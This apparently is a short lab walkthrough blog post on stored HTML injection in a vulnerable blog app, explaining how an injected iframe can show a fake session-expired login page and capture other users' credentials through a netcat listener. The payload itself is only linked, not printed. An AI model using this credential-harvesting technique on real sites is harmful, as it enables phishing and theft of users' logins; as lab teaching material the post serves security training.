HTML Injection -Stored (Blog)


For this vulnerability consider a scenario where the blog stores a commend or some sort of text message from the users.

16.1 17.1
As you can see the user teck submitted the text “test” at 15:21:36 on 2018-02-02
Let’s try basic html injection first 18.1 19.1
As you can see it’s working.
Now let’s try with <iframe> 20.1 21.1
It’s working, so using this we can trick the user to login to the web page and meanwhile we will capture the credential of that user. 22.1
Payload (Github)
Now as soon you will submit, the web page will show session expired and login page 23.1
Now refresh the nc and start listening again, and next time any user will login, we will be able to see the credentials. 24.1 25.1

~ Hack the World and Stay Noob

Twitter / Hack The Box / CTF Team / Teck_N00bs Community Telegram

Comments